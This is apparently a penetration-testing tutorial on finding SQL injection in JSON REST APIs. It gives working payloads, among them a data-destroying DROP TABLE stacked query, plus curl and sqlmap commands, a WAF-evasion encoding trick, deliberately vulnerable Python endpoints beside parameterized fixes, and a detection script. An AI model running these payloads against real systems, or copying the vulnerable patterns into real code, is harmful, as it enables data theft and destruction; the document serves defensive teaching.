ExploitQuest
In the modern web, APIs are everywhere — powering everything from web apps and mobile apps to IoT devices. However, developers often make the same classic mistakes when handling user input, especially in JSON-based RESTful APIs.
SQL Injection (SQLi) is a well-known vulnerability that is still very much alive: it can exist in any API where user input ends up in a query string without proper validation and parameterization.
This article explores advanced techniques for identifying and exploiting SQL injection in APIs, particularly in JSON payloads. It is tailored for penetration testers and bug bounty hunters seeking to level up their API testing game.
━━━━━━━━━━━━━━━
🎯 Where to look
•POST requests with JSON bodies
•GraphQL endpoints
•PUT/PATCH methods with nested objects
•Endpoints with dynamic filters or search queries

🚩 Signs of SQLi
•Database-related error messages in API responses
•Unusual delays in response (time-based blind SQLi)
•Reflection of user input in responses or logs
•Status code anomalies (e.g., 500 Internal Server Error)
━━━━━━━━━━━━━━━
Let’s say you’re testing the following API:
POST /api/user/details HTTP/1.1
Host: vulnerable.site
Content-Type: application/json
{
"username": "admin"
}
Try payload injection:
{
"username": "' OR '1'='1"
}
Or blind time-based (MySQL; the -- comment needs a trailing space, so end the payload with "-- -" to keep that space visible):
{
"username": "' OR SLEEP(5)-- -"
}
The same request from the command line. The JSON body is wrapped in double quotes so the single quote in the payload does not break shell quoting:
curl -X POST https://vulnerable.site/api/user/details \
-H "Content-Type: application/json" \
-d "{\"username\": \"' OR 1=1 -- -\"}"
Or filter objects:
{
"filter": {
"email": "admin@site.com' OR '1'='1"
}
}
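As an added example (not code from the original post), here is a Python sketch of the two endpoints above, each written twice: once with the decoded JSON value concatenated into the SQL text, and once parameterized, run against a constructed in-memory SQLite table. The function names, schema, rows, and allow-list are assumptions for the demo; the request bodies are the same payloads shown above. The filter variant also shows the case the text hints at with "dynamic filters": when the JSON key becomes a column name, the key is injectable too, and column names cannot be bound as parameters, so they need an allow-list.

```python
import json
import sqlite3

# Constructed sample payloads, in the same shape as the request bodies above.
PAYLOAD_NORMAL = '{"username": "admin"}'
PAYLOAD_TAUTOLOGY = '{"username": "\' OR \'1\'=\'1"}'
PAYLOAD_COMMENT = '{"username": "\' OR 1=1 -- -"}'
FILTER_NORMAL = '{"filter": {"email": "alice@site.com"}}'
FILTER_TAUTOLOGY = '{"filter": {"email": "admin@site.com\' OR \'1\'=\'1"}}'
FILTER_BAD_COLUMN = '{"filter": {"role = \'x\' OR 1=1 --": "y"}}'   # injects via the key

ALLOWED_FILTER_COLUMNS = {"username", "email", "role"}   # assumed allow-list for this demo


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the API's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email, role) VALUES (?, ?, ?)",
        [("admin", "admin@site.com", "admin"),
         ("alice", "alice@site.com", "user"),
         ("bob", "bob@site.com", "user")],
    )
    return conn


def user_details_vulnerable(conn: sqlite3.Connection, body: str) -> list:
    """POST /api/user/details the way it is too often written: the decoded JSON
    value is dropped straight into the SQL text. Deliberately vulnerable."""
    username = json.loads(body)["username"]
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def user_details_safe(conn: sqlite3.Connection, body: str) -> list:
    """Same endpoint with a bound parameter: the value can never become SQL syntax."""
    username = json.loads(body)["username"]
    return conn.execute("SELECT username, role FROM users WHERE username = ?", (username,)).fetchall()


def search_vulnerable(conn: sqlite3.Connection, body: str) -> list:
    """Dynamic filter endpoint that concatenates both the JSON key (column) and
    the value. Either side of the '=' is injectable. Deliberately vulnerable."""
    filters = json.loads(body)["filter"]
    where = " AND ".join(f"{col} = '{val}'" for col, val in filters.items())
    return conn.execute(f"SELECT username FROM users WHERE {where}").fetchall()


def search_safe(conn: sqlite3.Connection, body: str) -> list:
    """Column names cannot be bound as parameters, so they are checked against an
    allow-list; values are bound. Unknown keys are rejected, not cleaned."""
    filters = json.loads(body)["filter"]
    unknown = set(filters) - ALLOWED_FILTER_COLUMNS
    if unknown:
        raise ValueError(f"unknown filter column(s): {sorted(unknown)}")
    where = " AND ".join(f"{col} = ?" for col in filters)
    params = tuple(str(v) for v in filters.values())
    return conn.execute(f"SELECT username FROM users WHERE {where}", params).fetchall()


def demo() -> dict:
    """Row counts each variant returns per payload (3 rows = the whole table leaked)."""
    conn = build_db()
    out = {
        "details_vuln_normal": len(user_details_vulnerable(conn, PAYLOAD_NORMAL)),
        "details_vuln_tautology": len(user_details_vulnerable(conn, PAYLOAD_TAUTOLOGY)),
        "details_vuln_comment": len(user_details_vulnerable(conn, PAYLOAD_COMMENT)),
        "details_safe_tautology": len(user_details_safe(conn, PAYLOAD_TAUTOLOGY)),
        "search_vuln_tautology": len(search_vulnerable(conn, FILTER_TAUTOLOGY)),
        "search_vuln_bad_column": len(search_vulnerable(conn, FILTER_BAD_COLUMN)),
        "search_safe_normal": len(search_safe(conn, FILTER_NORMAL)),
        "search_safe_tautology": len(search_safe(conn, FILTER_TAUTOLOGY)),
    }
    try:
        search_safe(conn, FILTER_BAD_COLUMN)
        out["search_safe_bad_column"] = "accepted"
    except ValueError:
        out["search_safe_bad_column"] = "rejected"
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:26} {result}")
```

Running the script shows the vulnerable lookups returning all three users for the tautology and comment payloads, while the parameterized versions return nothing for them and the allow-list rejects the injected column name outright. Note that SQLite's `execute()` refuses stacked statements, so a `'; DROP TABLE users;--` payload raises an error here rather than running; whether stacked queries work at all depends on the driver and database in use.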
Or nested objects (a stacked query like this one only executes where the driver allows multiple statements per call):
{
"user": {
"id": "1'; DROP TABLE users;--"
}
}
━━━━━━━━━━━━━━━━━━
🔧 Tools
•Burp Suite (Pro): use Intruder or Repeater to fuzz JSON payloads.
•SQLMap with --data (it recognizes a JSON body and asks whether to inject into its values; with --batch it says yes) or -r with a saved request file:
sqlmap -u https://vulnerable.site/api/login \
--data '{"user":"admin","pass":"pass"}' \
--headers="Content-Type: application/json" \
--level=5 --risk=3 --batch
Keep in mind that --risk=3 enables OR-based payloads that can modify data if the injection lands in an UPDATE or DELETE, so use it only against targets you are authorized to test.
•Postman: Manual testing and injection
•Nuclei with custom templates
━━━━━━━━━━━━━━━━━━
💡 Pro Tips
•Always analyze API docs (Swagger/OpenAPI) for parameter names, types, and hints.
•Use Burp Collaborator for detecting out-of-band SQLi.
•Test for second-order injection, especially in multi-step flows.
•Try JSON-specific encodings. The JSON parser decodes them before the value reaches the query, so they get past filters that only inspect the raw body, not past the database:
•Unicode escapes: \u0027 OR \u0031=\u0031 (decodes to ' OR 1=1)
•Base64 in API params that the server decodes before use
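The encoding tip above is also the reason a body-grep WAF rule misses these payloads. As an added example (not from the original post), here is a small Python inspector for JSON request bodies that decodes the body first, so \u0027 is already a real quote when it is checked, and then walks nested objects and arrays, flagging strings that look like the payloads in this post. The pattern list, sample bodies, and function names are constructed for the demo; the patterns are heuristics, not a production ruleset.

```python
import json
import re

# Heuristic patterns for the payload shapes discussed in this post. Constructed
# for the demo; the comment-terminator rule in particular is noisy on real traffic.
SQLI_PATTERNS = [
    ("tautology", re.compile(r"'\s*(or|and)\s+[\w']+\s*=\s*[\w']+", re.I)),  # ' OR '1'='1 / ' OR 1=1
    ("time-based", re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.I)),
    ("union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("stacked", re.compile(r";\s*(drop|delete|update|insert|alter)\b", re.I)),
    ("comment", re.compile(r"--|/\*")),
]

# Constructed sample bodies. The "unicode" one is a raw string, so the body really
# contains the six characters \u0027, exactly as it would on the wire.
SAMPLE_BODIES = {
    "benign": '{"username": "admin", "filter": {"email": "alice@site.com"}}',
    "tautology": '{"username": "\' OR \'1\'=\'1"}',
    "nested": '{"user": {"id": "1\'; DROP TABLE users;--"}}',
    "array": '{"ids": ["1", "2", "3 UNION SELECT username, password FROM users"]}',
    "unicode": r'{"username": "\u0027 OR \u0031=\u0031"}',
}


def walk_strings(value, path="$"):
    """Yield (json_path, string) for every string anywhere in a decoded document."""
    if isinstance(value, dict):
        for key, child in value.items():
            yield from walk_strings(child, f"{path}.{key}")
    elif isinstance(value, list):
        for i, child in enumerate(value):
            yield from walk_strings(child, f"{path}[{i}]")
    elif isinstance(value, str):
        yield path, value


def inspect_body(raw_body: str) -> list:
    """Return [(json_path, value, rule_name)] for every string that trips a rule.
    Decoding happens first, so JSON escapes such as \\u0027 are already real quotes
    by the time the regexes run, the same view the application's SQL layer gets."""
    try:
        doc = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        return [("$", raw_body, f"invalid JSON: {exc.msg}")]
    findings = []
    for path, text in walk_strings(doc):
        for name, pattern in SQLI_PATTERNS:
            if pattern.search(text):
                findings.append((path, text, name))
                break   # one rule per value is enough for a finding
    return findings


def naive_quote_rule(raw_body: str) -> bool:
    """What a rule that only greps the undecoded body sees: True if a literal
    single quote is present. This is the check that \\u0027 walks past."""
    return "'" in raw_body


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(f"{label:10} raw-quote-rule={naive_quote_rule(body)!s:5} decoded={inspect_body(body)}")
```

For the "unicode" body the raw-quote rule reports nothing while the decoded walk flags `$.username` with the value `' OR 1=1`; the nested and array bodies show why the walk has to recurse into objects and lists rather than only looking at top-level keys.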
━━━━━━━━━━━━━━━━━━
🛡️ Mitigation (For Blue Team Awareness)
•Use parameterized queries / prepared statements; allow-list any identifiers (column or table names) that cannot be bound as parameters
•Validate input against a strict schema (type, length, format); sanitizing alone is not a substitute for parameterization
•Apply WAF rules and anomaly detection for API behavior
•Implement rate limiting and access control
━━━━━━━━━━━━━━━━━━
SQL Injection is far from dead — it's just evolving. Modern APIs, especially those handling complex JSON bodies, often become attack vectors due to developer assumptions or insecure ORM usage. With the right mindset, tools, and techniques, ethical hackers can uncover and responsibly disclose serious vulnerabilities before attackers do.
Happy hacking and see you next time!
#CyberSecurity #MSSQL #EthicalHacking #json #api #JavaScriptSecurity #WebSecurity #BugBounty #SecurityResearch #WebHacking